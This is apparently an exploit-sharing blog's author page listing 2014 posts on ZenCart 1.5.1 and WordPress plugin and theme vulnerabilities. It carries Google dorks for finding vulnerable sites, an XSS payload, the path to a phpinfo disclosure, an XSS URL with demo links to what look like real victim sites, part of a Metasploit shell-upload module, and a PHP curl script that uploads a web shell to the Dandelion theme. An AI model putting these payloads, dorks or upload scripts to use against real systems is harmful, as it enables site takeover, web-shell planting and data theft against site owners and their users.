1337mir

About 1337mir

This author has not yet filled in any details.
So far 1337mir has created 49 entries.

ZenCart 1.5.1 Multiple Vulnerabilities

By |February 24th, 2014|

Exploit Title: ZenCart v1.5.1 – Multiple Vulnerabilities
Exploit Author: UmPire
Date: 21 Feb 2014
Vendor Homepage: https://www.zen-cart.com/
Version: 1.5.1
Tested on: Windows
Google Dork: inurl:”zc_install/index.php”

Cross Site Scripting Vulnerability
In the fourth step of installation, there are vulnerable fields.
vulnerable input: ” onmouseover=alert(/Hacked/) bad=”

Full Path Disclosure
In the third step of installation there is this vulnerability
Path_Translated = Drive:\\[WebPage-Directiory]\\[USER]\\zen\\zc_install\\index.php

Sensitive phpinfo reading
This is in this path:
http://[Host]/zen/zc_install/includes/phpinfo.php

Demo […]

Comments Off on ZenCart 1.5.1 Multiple Vulnerabilities

WordPress WP-Password Plugin XSS Vulnerability

By |February 24th, 2014|

title: WordPress WP-Password Plugin XSS Vulnerability
Author: Arash Cyber
date: 2/15/2014
Category: WebApp
Google Dork: inurl:”/wp-content/plugins/wp-password/login.php”
Tested On: Windows – Linux
Site: Attacker-Team.org

# Type: XSS Vulnerability
# Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}
# Explaination: Copy The Dork In Google – Open A Site – Delete All Texts After login.php
Copy This Code At The End Of The Url: ?err={Your Text} – And End ūüėÄ

Demo:
-http://fukushXimaboys.com/wp-content/plugins/wp-password/login.php?err=Your Text
-http://wakayXama-jc.net/2012/wp-content/plugins/wp-password/login.php?err=Your […]

Comments Off on WordPress WP-Password Plugin XSS Vulnerability

WordPress amerisale-re Remote file Upload Vulnerability

By |February 8th, 2014|

Exploit Title : WordPress amerisale-re Plugin Remote Shell Upload
Exploit Author : T3rm!nat0r5
Google Dork : inurl:/wp-content/plugins/amerisale-re
Vendor Homepage : http://wordpress.org/
Date : 2014/01/30
Tested on : Windows 8 , Linux
This module requires Metasploit: http//metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework

CoDE:

require ‘msf/core’
class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => ‘WordPress amerisale-re Plugin Remote
Shell Upload’,
‘Description’ => %q{
This module exploits an arbitrary […]

Comments Off on WordPress amerisale-re Remote file Upload Vulnerability

WordPress Dandelion Theme Shell Upload Vulnerability

By |February 8th, 2014|

Exploit Title: WordPress Dandelion Theme Shell Upload Vulnerability
Google Dork: inurl:/wp-content/themes/dandelion/
Date: 31/01/2014
Exploit Author: TheBlackMonster (Marouane)
Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
Software Link: Not Available
Version: Web Application
Tested on: Mozilla, Chrome, Opera -> Windows & Linux

CoDE:

< ? php $uploadfile="yourfile.php"; $ch = curl_init("http://127.0.0.1:8080/wp-content/themes/dandelion/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
? >

File Access :

http://127.0.0.1:8080/uploads/[years]/[month]/your_shell.php

Comments Off on WordPress Dandelion Theme Shell Upload Vulnerability